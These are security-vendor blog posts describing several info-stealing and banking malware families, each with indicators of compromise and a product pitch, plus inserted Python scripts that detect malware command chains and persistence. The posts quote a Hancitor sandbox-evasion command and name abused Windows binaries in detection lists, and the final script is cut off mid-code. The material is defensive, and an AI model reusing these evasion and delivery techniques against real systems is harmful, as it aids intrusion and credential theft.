Kpot, an older information stealer, just got a major update and is being seen in the wild again. This time Kpot brings zero persistence (meaning it is not written to disk and does not survive a reboot) and instead does all of its work in memory before leaving your computer completely. That removes the ability to detect it without real-time protection.
How it works
Kpot is delivered mainly through malicious email attachments. When opened, they ask the user to click "Enable Editing" and claim to be unreadable until that is done. Clicking it runs the embedded code and gives the attacker full access to the computer. Once it is running, Kpot gets to work extracting as much as it can. First, it sends a message to its C&C server and asks what it should do. The reply can include many possible commands, and the set can be updated over time; at the time of this writing it includes the following.
Browsers (Chrome, Firefox, Internet Explorer): cookies, passwords, autofill data, and history are taken and sent back to the C&C server.
Crypto: various cryptocurrency files. These can reveal a great deal of information about credentials, emails, and wallets, depending on what the wallet software stores on the computer.
Discord: a chat service advertised mainly to gamers. Chat history and user information can be stolen from its files on the computer.
Battle.net: the game portal for World of Warcraft, StarCraft, and Diablo, among others. Account information can be stolen this way, leading to compromised accounts unless further safeguards such as two-factor authentication are in place.
Screenshots: Kpot can capture what is currently on your screen. This can be done when it recognizes an open banking window or other sensitive information that may not be stored on your computer but is visible on the screen.
Windows credentials: Kpot can steal your Windows account information, such as username and password.
Grabber: a more advanced version of the grabber Qulab uses. Kpot uses it to find files that may contain valuable information but are not tied to a specific application; an example would be a "passwords.txt" on the desktop. Note that it does not select by name; instead it takes any file with certain extensions, such as txt, pdf, and doc, to name a few.
Delete: Kpot uses this command to delete itself from the computer, along with any other evidence that it was there.
Who is affected?
One of the scary things about Kpot is that it is very affordable on the dark web. Coming in at only $100, with support optional, it no longer takes a master hacker to obtain an information stealer that can then be used in a variety of ways. It could be slipped into downloads from illegitimate sources or used in malspam campaigns.
Indicators of Compromise
What you can do
If you or someone you know is infected with Kpot
malware, download SUPERAntiSpyware Professional right now and get a 14-day free
trial, no credit card required. SUPERAntiSpyware is easy to
install and will detect and remove Kpot from any Windows computer. If you are a
Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition
solution, now free for the next 30 days. Use Tech04 as the Tech ID. Click
here: https://www.superantispyware.com/technician-download.html
Info stealers are nothing new, and Qulab is no exception. Designed to get in quickly and take as much data as they can, these malicious programs steal personal information from your computer. In particular, Qulab is known in its current iterations to steal information from browsers, including:
login credentials and history
file transfer protocol credentials
Discord and telegram logs
Steam information and accounts
It can also copy any file that ends in .txt or .maFile, and any wallet.dat, in case you have anything important lying around.
How it works
Qulab is built in a scripting language called AutoIt. Generally used to automate monotonous keyboard-and-mouse tasks, AutoIt gives the attacker much of the power of a full programming language while being easier (in most cases) to write. Once executed on your computer, Qulab sets a few important options, notably AutoIt's no-tray-icon setting, which stops you from seeing it running. Qulab then replaces common Windows function calls and database queries with its own slightly modified versions, shipped alongside the malware (the bundled SQLite library listed in the indicators below is one example). By carrying its own copies of these components, the malware reduces its reliance on what is installed on the computer it is infecting, which lets it do more damage.
Once running on your computer, the malware quickly sets up persistence through well-known methods, such as running the program at startup, and a less well-known method that reruns the malware on any major system change, such as:
changing any computer settings
network status changes
connecting a laptop to, or disconnecting it from, its charger
being idle for a set period of time
The "clipper" functionality of Qulab revolves around watching what is in your clipboard (the place that stores data you copy) and changing it when it matches certain patterns. Most notably, it replaces cryptocurrency wallet addresses so that a payment you paste goes to the attacker's wallet rather than the one you copied. If you never copy wallet addresses, the clipper has nothing to replace, but it keeps running and slowing down your computer.
The "browser stealer" function checks which browsers you have installed and then immediately attempts to steal files containing important information. The most notable are wallet.dat, login data stored by the browser, and browsing history.
Discord, an online chat service, saves messages and chat history on the local computer when installed. Qulab looks for these files and, if it finds them, decrypts them and sends them off to the attacker.
Qulab also attempts to hijack Steam sessions, and if the computer uses Steam Desktop Authenticator, Qulab also attempts to steal the .maFile that holds its authentication details. This is becoming common for most information stealers.
After all this data has been extracted, Qulab sends it to the attacker and then continues to scan every couple of seconds to see if any new information has appeared.
Who is affected?
One of the scary things about Qulab is that it is very affordable on the dark web. Coming in at only $30, with support optional, it no longer takes a master hacker to obtain a powerful, flexible information stealer. It could be slipped into downloads from illegitimate sources or used in malspam campaigns.
Indicators of Compromise
%APPDATA%/%RANDOM_FOLDER%/
%APPDATA%/%RANDOM_FOLDER%/1/
%PAYLOAD_NAME%.module.exe (7zip)
%PAYLOAD_NAME%.sqlite.module.exe (sqlite3.dll)
IP 185.142.97.228
What you can do
If you or someone you know is infected with Qulab malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required. SUPERAntiSpyware is easy to install and will detect and remove Qulab from any Windows computer. If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech04 as the Tech ID. Click here: https://www.superantispyware.com/technician-download.html
Scranos is a new player on the global malware scene that leverages many well-known and some new methods to obtain login credentials and bank information. It can also steal or manipulate session information for several online services to gain access to your Amazon, Airbnb, Facebook, Steam, and YouTube accounts.
How it works
Scranos is installed through various methods, including:
cracked software
pirated videos and movies
legitimate-looking alternative software such as e-book readers, video players, driver updaters, and fake antimalware products
When installed, Scranos installs a rootkit driver that ensures it remains on the computer unless removed by a legitimate antivirus program.
Once Scranos has gained persistence, it injects a downloader into another running process so that it can fetch additional functionality. When it is done, Scranos removes all downloaded content from the computer to make it easier to stay hidden.
Among the functionality that Scranos downloads is a YouTube module. This module launches Chrome (installing it if it is not already present), goes to YouTube, mutes it, and subscribes to channels that the attackers use to earn money. Other components Scranos downloads include:
modules that steal information from various online platforms
modules that inject fake advertisements
bitcoin miners
In addition, Scranos has components for other operating systems such as Linux, iOS, and Android. These can be delivered through phishing messages sent from infected users' Facebook accounts.
Who is affected?
Scranos, because of its infection methods, can affect anyone, even those who do not download pirated software. While Scranos was active in a testing form in several regions, it has been seen on a global scale in recent months, indicating either that testing is done or that the operators are now testing at a larger scale. Either way, Scranos seems to be just getting started, and everyone is at risk.
Indicators of compromise
YouTube or Facebook accounts showing activity at times when they were not in use
%WINDIR%\System32\<random looking names>
wcrx.exe
Chrome extensions that the user didn’t install
Y2B.EXE
HKCU\Software\@demo
HKLM\Software\Microsoft\@msver1
HKLM\Software\Microsoft\@msver2
HKLM\Software\Microsoft\@o2
HKLM\Software\Microsoft\@o3
What you can do
If you or
someone you know is infected with Scranos malware, download SUPERAntiSpyware
Professional right now and get a 14-day free
trial, no credit card required. SUPERAntiSpyware is easy to
install and will detect and remove Scranos from any Windows computer. If you
are a Computer Technician, you may like to try our SUPERAntiSpyware Tech
Edition solution, now free for the next 30 days. Use Tech04 as the Tech ID. Click here: https://www.superantispyware.com/technician-download.html
TrickBot is once again making itself known during tax season, attempting to steal your hard-earned money. TrickBot was first discovered in October 2016 but has since changed and evolved dramatically into one of the most prolific threats today.
How it works
Just like Emotet, TrickBot primarily spreads through specially crafted emails (malspam) that attempt to trick the user into clicking a link or opening an attachment. The current campaign, as of this writing, is TrickBot's usual tax-season attack: pretending to be the IRS. In the example below, the link sends you to a domain that looks official but is slightly misspelled.
Once TrickBot is installed on a computer, it creates a scheduled task to make sure it has a persistent presence before it starts stealing information. In addition, it disables Windows Defender early on so that it will not be removed. SUPERAntiSpyware is not stopped in this way.
TrickBot does not show any signs of running on a user's computer; the only "noise" it makes is the network traffic it generates. Recording network traffic is generally only done by businesses, which helps TrickBot evade detection on personal computers.
TrickBot uses a modular design, much like Emotet and other bankers. Not only does this let TrickBot change its capabilities quickly, it also makes it harder to detect. Each module usually does one thing well rather than trying to do many things. Some are designed to go after hosted FTP servers, cached Remote Desktop credentials, and bitcoin mining accounts.
The most common module, however, allows TrickBot to redirect the user to fake bank sites that, instead of logging the user in, will steal account credentials. The scammers make this possible by domain squatting, or registering an internet address that is only slightly different than the one you intend to visit. For instance, if you receive an email about your GoDaddy account, you might not notice if a link in that email goes to godabdy.com/payyourbill (godaddy is misspelled with a b instead of the second d).
This is compounded by hiding the real URL so that only a careful reader will look for it, and by making the site look the way you expect through careful recreation by the attackers. Many big companies try to combat this by registering these look-alike domains themselves and redirecting them to the real site, but that is not always practical.
Who is affected?
TrickBot is aimed more at businesses than casual users; however, it is still the number-one banker, and anyone in the USA, Africa, Europe, or the Middle East should be wary. (This does not mean other areas will not be hit, only that they are not the current target.)
Indicators of Compromise
C:\Documents and Settings\<USER>\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1275210071-920026266-1060284298-1003\8c8436195f6e0875edb85e34665c32ec_fabbc6a1-c573-4ea0-9ca1-50004b35a440
Scheduled task that points to a file in AppData, such as C:\Users\<User>\AppData\Roaming\
What you can do
If you or someone you know is infected with TrickBot malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required.
SUPERAntiSpyware is easy to install and will detect and remove TrickBot from
any Windows computer. If you are a Computer Technician, you may like to try our
SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use
Tech04 as the Tech ID. Click here: https://www.superantispyware.com/technician-download.html
Hancitor, also known as Chanitor, is known for dropping its payloads rather than downloading them post-infection, as well as for a unique phishing approach to trick users into downloading and activating Microsoft Word documents with malicious macros.
How it works
Hancitor's current template attempts to fool the user into believing the email is a FedEx tracking notification. There is no attachment; instead, the tracking-number link directs the user to the sjkfishfinders[.]com domain, which downloads the Word document. Once downloaded, the Word file attempts to trick the user into allowing macros, which would trigger the code residing inside the file. An example can be seen below:
The lack of an attachment, which many users regard as a red flag, may lull the user into a false sense of security. It is important to be careful about which links you click: in most modern web browsers, hovering the mouse pointer over a link shows where it leads. If you do not recognize the address, it is safer not to follow the link.
When the user enables the macro, the payload is not downloaded from the internet; instead it is extracted from inside the document and dropped into the hidden \AppData\Local folder. Before finishing, the script launches the command cmd.exe /c ping localhost -n 100 && C:\Users\admin\AppData\Local\Temp\6.pif. Ping is used purely as a delay: 100 echo requests to localhost take roughly 100 seconds, long enough to outlast automated sandboxes that only watch a sample for a short time, after which the dropped application 6.pif runs. 6.pif then reaches out to a C&C server before downloading new malware or running commands.
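The ping-and-run chain above is easy to hunt for in process-creation telemetry. The following Python is an added example, not code from the original post or from Hancitor: it takes the CommandLine field of process-creation events (Sysmon Event ID 1 or Windows Security event 4688 would supply real ones), recognizes a ping against the local host being used as a sleep, extracts the request count (Windows ping waits about a second between requests, so the count is roughly the delay in seconds), and reports any executable launched afterwards from a user's Temp folder. The sample command lines, including the Hancitor one quoted above, are constructed here.

```python
"""Hunt for 'ping localhost -n <N> && <payload>' delay chains in process telemetry.

Added example for this post (not Hancitor's code). Windows ping sends one echo
request per second by default, so "-n 100" is roughly a 100-second sleep.
"""
import re

LOCAL_TARGETS = {"localhost", "127.0.0.1", "::1"}

# "ping" or "ping.exe" followed by its arguments, up to the end of the segment.
PING_RE = re.compile(r"\bping(?:\.exe)?\s+(?P<args>.*)$", re.IGNORECASE)
# Output redirections such as "> nul" are noise, not ping arguments.
REDIRECT_RE = re.compile(r"[12]?>>?\s*\S+")
# Windows ping switches that consume the following token.
VALUE_FLAGS = {"-n", "-l", "-i", "-v", "-w", "-r", "-s", "-j", "-k", "-S"}
# Executables launched from a user's Temp directory (where Hancitor drops 6.pif).
USER_TEMP_EXE_RE = re.compile(
    r"[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\[^\s\"'&|]+"
    r"\.(?:exe|pif|com|scr|bat|cmd|vbs|js)\b",
    re.IGNORECASE,
)


def parse_ping(segment):
    """Return (target, request_count) if segment is a ping invocation, else None."""
    m = PING_RE.search(segment)
    if m is None:
        return None
    tokens = REDIRECT_RE.sub("", m.group("args")).split()
    target, count, i = None, 4, 0  # Windows ping sends 4 requests unless -n is given
    while i < len(tokens):
        tok = tokens[i]
        if tok.lower() == "-n" and i + 1 < len(tokens) and tokens[i + 1].isdigit():
            count = int(tokens[i + 1])
            i += 2
        elif tok in VALUE_FLAGS:
            i += 2
        elif tok.startswith(("-", "/")):
            i += 1
        else:
            target = tok  # the last bare token is the host being pinged
            i += 1
    return target, count


def analyze_cmdline(cmdline):
    """Return a finding if cmdline pings the local host and then runs a Temp executable."""
    # cmd.exe runs these segments left to right; '&&' only continues on success.
    segments = [s.strip() for s in re.split(r"&&|\|\||&", cmdline)]
    for idx, seg in enumerate(segments):
        parsed = parse_ping(seg)
        if parsed is None or parsed[0] is None or parsed[0].lower() not in LOCAL_TARGETS:
            continue
        payload = USER_TEMP_EXE_RE.search(" ".join(segments[idx + 1:]))
        if payload:
            return {
                "delay_seconds": parsed[1],
                "payload": payload.group(0),
                "cmdline": cmdline,
            }
    return None


def scan(cmdlines):
    """Run analyze_cmdline over a batch of command lines and keep the hits."""
    return [f for f in map(analyze_cmdline, cmdlines) if f is not None]


# Constructed sample command lines; the first is the one quoted in the post.
SAMPLE_CMDLINES = [
    r"cmd.exe /c ping localhost -n 100 && C:\Users\admin\AppData\Local\Temp\6.pif",
    r"ping 8.8.8.8 -n 4",                # a real connectivity check, not a delay
    r"cmd.exe /c ping localhost -n 100",  # a delay with nothing chained after it
    r'cmd.exe /c ping 127.0.0.1 -n 30 > nul & "C:\Users\bob\AppData\Local\Temp\upd.exe" /s',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print(f"delay ~{finding['delay_seconds']}s, then runs {finding['payload']}")
```

The target check matters: ping against a real remote host chained with a script is ordinary admin behaviour, while ping against localhost exists only to burn time. Lowering the request-count threshold or widening USER_TEMP_EXE_RE to AppData\Roaming would catch variants that drop elsewhere.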
In addition to 6.pif, another file is dropped at C:\Users\admin\AppData\Local\Temp\6fsdFfa.com. This executable is a banker. Immediately after being run, it reaches out to api.ipify.org, which returns the victim's public IP address. It then attempts to submit several unique values and the IP address, in plain text, to a list of compromised servers. If a server replies that it is available to receive data, the program begins collecting all the usernames and passwords it can obtain and submits them to that server.
Other templates have been used by Hancitor in the past, including but not limited to divorce papers, parking tickets, and FTC claims. As always, it is important to keep Microsoft Office macros disabled unless your job requires them.
Who is affected?
Anyone with an email address can become a target of this mal-spam campaign. While it does not use victims’ email addresses like Emotet does, Hancitor’s unique templates are meant to catch even savvy users off guard, regardless of whether the email is used for work or is a personal email.
If you or someone you know is infected with Hancitor malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required. SUPERAntiSpyware is easy to install and will detect and remove Hancitor from any Windows computer.
Restart the infected computer in safe mode
without networking.
Search through the files and folders named in the How it works section above and investigate any you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
Delete files and folders that have been
confirmed as malware.
Repeat steps 1-3 on all other machines in the
network.
Restore all infected computers to normal mode
only after confirming the infection is removed.
Attack Vector: the way an attacker gains access to a target. The most common is malicious email, but many more exist and new ones are discovered all the time.
Backdoor: a bypass that lets a malicious user connect to the target machine without the owner's permission. It can take the form of default usernames and passwords baked into a device, or a malicious download that opens a connection for the attacker.
Black hat: a hacker who hacks for personal gain. The term comes from old Western movies, where the good guy wore a white hat and the bad guys wore black hats.
Banker: a malicious program that attempts to steal banking information from the user.
Command and Control (C&C): a server under the attacker's control that listens for messages from the malware and replies with commands for it to execute. For example, a piece of malware infects a Windows computer and detects that the user has Chrome but not Firefox. It messages its C&C asking what to do, and the C&C tells it to run only the Chrome information-stealer command rather than all of its commands. Afterwards, the malware sends the information it gathered back to the C&C server.
Domain squatting/cybersquatting: holding, or squatting on, a misspelled or visually similar web address to trick victims into visiting and trusting the site.
Downloader: software that maliciously downloads another file from the internet and then executes it.
Dropper: software that carries a malicious file inside itself, which it extracts and then runs.
Keylogger: software designed to record every key pressed on your keyboard, mostly used to steal usernames and passwords.
Malspam (malicious spam): emails sent by attackers that pretend to be something you would expect to receive. This is a very common attack.
Phishing: a fraudulent attempt to obtain sensitive information such as usernames, passwords, and credit card details by posing as a trustworthy entity. Normally done over email or instant messaging.
Ransomware: a type of malware that encrypts your files, effectively holding your documents hostage until you pay to get them unlocked.
Rootkit: a type of malware that abuses the operating system's trust in certain key, often low-level, components in order to gain persistence and become harder to remove.
Supply Chain Attack: an attack vector in which attackers gain access to trusted software and inject their own code into it, allowing them to bypass many security checks.
Delivered through malicious spam campaigns, Loki focuses on stealing credentials off the victim computer and runs a keylogger. Loki also communicates back to a Command and Control server (C&C) to report what it finds and to receive commands if needed.
How it works
Loki, named after its creator's username, Lokistov, is delivered through a variety of channels, but the most common is malicious email. The most common strategy is the familiar "invoice" email that tries to get the potential victim to open the attachment. Once opened, the "invoice" tries to run embedded macros or to get the user to follow a link to a downloader. One example of such an "invoice" can be found below.
If the potential victim clicks "Enable Content," Loki is installed and starts gathering data. This is a common attack vector and was also used, albeit in a more complex way, by Emotet.
This is not the only way Loki can be delivered, however: because Loki is sold to whoever will buy it, each buyer delivers it in whatever way is most cost-effective for them.
Loki focuses primarily on credential stealing and boasts the ability to steal from around 80 programs. The most notable are all the major browsers, including:
Google Chrome
Mozilla Firefox
Microsoft Edge
Microsoft Internet Explorer
Opera Software’s Opera browser
In addition to this already worrying list, Loki can go after many alternative versions of these browsers, such as:
8pecxstudio’s variant of Firefox, Cyberfox
Google’s open-source browser Chromium
Independently developed Firefox fork, WaterFox
Nichrome
In addition to browsers, Loki can go after FTP clients, Microsoft Outlook, and the independently developed SuperPuTTY. This list will likely be expanded in future campaigns to cover more commonly used programs.
After connecting to and confirming the presence of its C&C server, Loki launches a keylogger in a separate thread. This keylogger records every key pressed while it runs and can reveal other usernames and passwords that were not stored in a program it can access. This is then bundled with any other data it retrieved.
Once the data is gathered, it is compressed and sent to the C&C server hosted by the malicious actor. These servers are normally shut down quickly after a new campaign is identified, but they can remain active for days or weeks, giving the attackers plenty of time to move the gathered data elsewhere and sell it.
Who is affected?
Loki can be bought on the dark web for fairly cheap. The last known price at the time of this writing was $70. The consequence is that Loki can be used to target anyone. The upside of that availability is that samples are easy for anti-malware companies to obtain and detect.
Indicators of Compromise
C:\Users\admin\AppData\Local\Temp\saver.scr
a.doko.moe
MD5: 500F84B83BE685009C136A67690CA0C3
What you can do
If you or someone you know is infected with the Loki malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required. SUPERAntiSpyware is easy to install and will detect and remove Loki from any Windows computer.
Restart the infected computer in safe mode without networking.
Search through the items in the Indicators of Compromise section above and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
Delete files and folders that have been confirmed as malware.
Repeat steps 1-3 on all other machines in the network.
Restore all infected computers to normal mode only after confirming the infection is removed.
ServHelper is a new backdoor, with a downloader variant, that first appeared in November 2018. Attributed to the threat actor TA505, ServHelper spreads through email campaigns using a quantity-over-quality approach that has proven to work, albeit less effectively than the Emotet strategies discussed here. ServHelper seems to be largely targeted at businesses but could shift its focus to individuals in future campaigns.
How it works
ServHelper is downloaded through Microsoft Word documents with macros. The documents often pretend to be invoices, though they may take other forms, such as greeting cards, complaints, or messages from your bank. These documents attempt to convince the victim to enable macros by saying that the content cannot be viewed until macros are enabled. If the victim clicks the Enable Content button, the infected document runs code that downloads ServHelper to the computer. You can learn more about how to protect yourself here. An example is shown below:
Another method ServHelper uses is to distribute PDF files claiming that you must follow the link provided to update your PDF viewer. The link instead leads to a download server that infects anyone who visits. The end result is the same whether the victim is infected through a Word document or a PDF.
Once installed, ServHelper does one of two things.
Establishes a remote-control session that allows the malicious actor to control the infected computer from anywhere. To accomplish this, the malware talks to a Command and Control server (C&C) from which it takes its commands. Notable commands include killing itself and removing its traces from the computer, copying the user's browser profiles, and executing a command shell. This gives the attackers access to your PII as well as any passwords, usernames, bank account information, and more.
Drops another piece of malware known as FlawedGrace. ServHelper recently removed some of its own capabilities (in this variant only) to focus instead on dropping this malware. FlawedGrace is a remote-access Trojan providing functions similar to ServHelper's.
Who is affected?
ServHelper largely targets businesses, so most of the emails are designed to look like ones you would see in your day-to-day work, such as invoices. Despite this focus, it is entirely possible for computers outside a business to be infected and compromised, so protection is paramount.
Indicators of Compromise
ServHelper makes several changes that indicate a computer has been infected.
The most noticeable is the C:\Windows\ServHelper.dll that is dropped into the Windows folder.
Unusual scheduled tasks are always noteworthy, and ServHelper uses one to start itself every time the victim's computer boots.
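Scheduled tasks come up three times on this page: Qulab re-runs itself on system changes and idle, TrickBot's task points at a file in AppData, and ServHelper starts itself from a DLL in the Windows folder. The Python below is an added example, not code from any of these families or from SUPERAntiSpyware, that triages exported Task Scheduler XML for all three patterns. On a live host the input would be the output of schtasks /query /xml or the task files under C:\Windows\System32\Tasks; the four task definitions here are constructed, and the assumption that ServHelper.dll is launched through regsvr32 is an illustration only (the page does not say how the DLL is loaded).

```python
"""Triage exported Task Scheduler XML for the persistence patterns on this page.

Added example (not code from Qulab, TrickBot, ServHelper or SUPERAntiSpyware).
Real input: `schtasks /query /xml ONE /tn <name>` or C:\\Windows\\System32\\Tasks\\*.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations an ordinary user can write to; legitimate tasks rarely execute from them.
USER_WRITABLE_RE = re.compile(
    r"\\Users\\[^\\]+\\AppData\\|\\Users\\Public\\|\\ProgramData\\|\\Temp\\", re.IGNORECASE)
SYSTEM_DLL_DIR_RE = re.compile(r"\\Windows\\(?:System32|SysWOW64)\\", re.IGNORECASE)
# Windows binaries routinely abused to run a malicious DLL or script.
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
# Qulab-style "re-run on system change" triggers versus ordinary startup triggers.
EVENT_TRIGGERS = {"EventTrigger", "IdleTrigger", "SessionStateChangeTrigger"}
STARTUP_TRIGGERS = {"BootTrigger", "LogonTrigger"}


def triage_task(xml_text):
    """Parse one task definition and return what it runs, when, and why it looks bad."""
    root = ET.fromstring(xml_text)
    name = root.findtext("t:RegistrationInfo/t:URI", default="(unnamed)", namespaces=NS)
    trig_el = root.find("t:Triggers", NS)
    triggers = [] if trig_el is None else [c.tag.rsplit("}", 1)[-1] for c in trig_el]
    reasons = []
    for ex in root.iterfind("t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", default="", namespaces=NS) or "").strip().strip('"')
        args = (ex.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        if USER_WRITABLE_RE.search(cmd + " " + args):
            reasons.append("runs from a user-writable path: " + (cmd + " " + args).strip())
        binary = cmd.rsplit("\\", 1)[-1].lower()
        if binary in LOLBINS and ".dll" in args.lower() and not SYSTEM_DLL_DIR_RE.search(args):
            reasons.append(binary + " loads a DLL outside System32: " + args)
    if reasons:  # only explain the triggers for tasks that already look suspicious
        events = sorted(set(triggers) & EVENT_TRIGGERS)
        if events:
            reasons.append("re-launched on system events/idle: " + ", ".join(events))
        startup = sorted(set(triggers) & STARTUP_TRIGGERS)
        if startup:
            reasons.append("persists across boot/logon: " + ", ".join(startup))
    return {"name": name, "triggers": triggers, "suspicious": bool(reasons), "reasons": reasons}


def triage_all(task_xmls):
    return [triage_task(x) for x in task_xmls]


def _task(uri, triggers_xml, command, arguments=""):
    """Build a minimal, schema-shaped task definition (constructed test data)."""
    return (
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        f"<RegistrationInfo><URI>{uri}</URI></RegistrationInfo>"
        f"<Triggers>{triggers_xml}</Triggers>"
        f"<Actions><Exec><Command>{command}</Command><Arguments>{arguments}</Arguments></Exec></Actions>"
        "</Task>"
    )


# Illustrative event subscription: fire when a network profile connects or disconnects.
NETWORK_CHANGE = (
    "<EventTrigger><Subscription>&lt;QueryList&gt;&lt;Query Path='Microsoft-Windows-NetworkProfile/Operational'&gt;"
    "&lt;Select&gt;*[System[(EventID=10000 or EventID=10001)]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;"
    "</Subscription></EventTrigger>"
)

SAMPLE_TASKS = [
    # Qulab-like: AppData binary, re-run at logon, on network change and when idle.
    _task(r"\Updater", "<LogonTrigger/>" + NETWORK_CHANGE + "<IdleTrigger/>",
          r"C:\Users\bob\AppData\Roaming\k3j2d\svc.exe"),
    # TrickBot-like: logon task pointing into AppData\Roaming.
    _task(r"\Services Update", "<LogonTrigger/>", r"C:\Users\bob\AppData\Roaming\winapp\client.exe"),
    # ServHelper-like: DLL in C:\Windows; regsvr32 launch is an assumption for illustration.
    _task(r"\ServHelper", "<BootTrigger/>", "regsvr32.exe", r"/s C:\Windows\ServHelper.dll"),
    # Benign built-in task for contrast.
    _task(r"\Microsoft\Windows\Defrag\ScheduledDefrag", "<CalendarTrigger/>",
          r"%windir%\system32\defrag.exe", "-c -h -o -$"),
]

if __name__ == "__main__":
    for result in triage_all(SAMPLE_TASKS):
        if result["suspicious"]:
            print(result["name"], "->", "; ".join(result["reasons"]))
```

Trigger types are only reported once an action already looks wrong, so a Microsoft task that legitimately fires on idle does not get flagged by itself; the combination of a user-writable binary with an event or idle trigger is what distinguishes the Qulab behaviour from ordinary startup persistence.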
If you or someone you know is
infected with the ServHelper malware, download SUPERAntiSpyware Professional
right now and get a 14-day free trial, no credit card
required. SUPERAntiSpyware is easy to install and will detect and remove
ServHelper from any Windows computer.
Restart the infected computer in safe mode without networking.
Search through the Indicators of Compromise listed above and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
Delete files and folders that have been confirmed as malware.
Repeat steps 1-3 on all other machines in the network.
Restore all infected computers to normal mode only after confirming the infection is removed.
You may have heard of the Trojan Emotet before. Since first appearing back in 2014 as a banking Trojan, it has evolved into a multi-faceted threat that targets everyone. It uses social engineering through email to convince the user to open a Microsoft Word document and run its malicious macros. Even more worrisome, once Emotet has infected a target it attempts to take over the victim's Microsoft Outlook desktop application. If successful, Emotet goes through all sent emails and contacts and sends out a new wave of spam. Only this time, the potential victims receive the message from a trusted address.
A campaign from Emotet over the Christmas season read like a friend sending a seasonal greeting.
Dear <name>,
You make the stars shine brighter
and the winter days warmer just by being in my life. Merry Christmas to my
favorite person in the world.
Merry Christmas and a wonderful New
Year!
Greeting Card is attached
A lovely thing about Christmas is
that it’s compulsory, like a thunderstorm, and we all go through it together.
Garrison Keillor
While not limited to invoices or Christmas cards, these emails attempt to get the user to click the download link and then open the document. In the email above, the target may be fooled into thinking the attached greeting card is legitimate. The document actually contains a malicious macro, an embedded script. Macros were designed to automate repetitive work inside Office documents, but they were quickly abused by virus writers. The infection cannot run on its own, because Microsoft has disabled macros by default for more than a decade to stop exactly these scripts. Instead, Emotet uses a few techniques to get the user to re-enable them. Examples can be seen below.
The picture urges the user to click the Enable Content button, implying that they cannot view the Word document until they do so. You may have noticed that the bar itself says that macros have been disabled, and the Enable Content button will, in fact, enable them. The moment the button is clicked, the macros run, and within seconds you are infected. Even worse, in most cases you will have no indication from this point forward that anything is wrong. In one test case we briefly saw a command window appear:
This window lasted less than two seconds before disappearing. This attack vector is not unique to Emotet; it has been used by a number of ransomware campaigns in the past. If you ever receive a document you did not expect, you should always be extremely cautious with it, and you should never enable macros without a very good reason.
How it works
Emotet is an evolving malware family that primarily spreads through email spam campaigns. Emotet itself does not do much direct harm; instead, it opens the door for other malware whose operators pay for the access. It does this using a Command and Control server (C&C): Emotet asks its C&C for instructions and receives a command, which could be anything from "grab this malware sample and run it" to "tell me what passwords are stored in the user's browser." Emotet can receive updates and new capabilities the same way, which is why, if Emotet has infected your computer or network, it should be removed as quickly as possible.
Emotet does not stop at the first computer infected. Once it is on a network, it attempts to reach every other computer it can see by brute-forcing passwords and using known exploits. Unless strong passwords are enforced and all known vulnerabilities are patched, a single Emotet infection can spread to every computer on the network. Emotet is regularly updated with new exploits as they appear, so even if it is not successful at first, it will keep trying until it finds something that works.
Code
We won’t go into too much depth on the actual code itself, but a brief step-by-step walkthrough can be useful to get a better understanding on how this malware works.
1. The Word document contains a VBA script that is obfuscated so that it cannot be read at a glance. All this code does is launch a command shell, which then launches PowerShell, a far more capable scripting shell built into Windows.
2. Using PowerShell, the script attempts to download the core Emotet payload from one of a large number of distribution websites.
3. The randomly named payload then reaches out to the main server and requests a command. The command changes with the running campaign: it could fetch new malware or attempt to use your own email account to spread itself.
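Steps 1 and 2 leave a distinctive trace in process telemetry: an Office application spawning cmd.exe, which spawns PowerShell, typically with a base64 -EncodedCommand argument. The Python below is an added example, not Emotet's code or the post's own, that walks constructed Sysmon-style process events (pid, parent pid, image, command line), reports shells whose ancestry includes an Office application, decodes the PowerShell argument (UTF-16LE, then base64, which is what -EncodedCommand expects) and pulls the download URL out of it. The downloader script, the example.invalid host and the process IDs are all constructed for the sample.

```python
"""Spot Office -> cmd -> PowerShell chains and decode the PowerShell payload.

Added example for this post (not Emotet's code). Emotet's macro launches cmd.exe,
which launches PowerShell with a base64 -EncodedCommand (UTF-16LE text) that
downloads the payload. The events below mimic Sysmon Event ID 1 and are constructed.
"""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# powershell.exe accepts -e, -ec, -en, -enc and the full -EncodedCommand.
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext script behind -EncodedCommand, or None if there is none."""
    m = ENCODED_RE.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_office_shell_chains(events):
    """Report shells whose ancestry includes an Office application."""
    by_pid = {e["pid"]: e for e in events}
    # A cmd.exe that merely launches powershell.exe is reported through its child.
    shell_parents = {e["ppid"] for e in events if basename(e["image"]) in SHELLS}
    findings = []
    for e in events:
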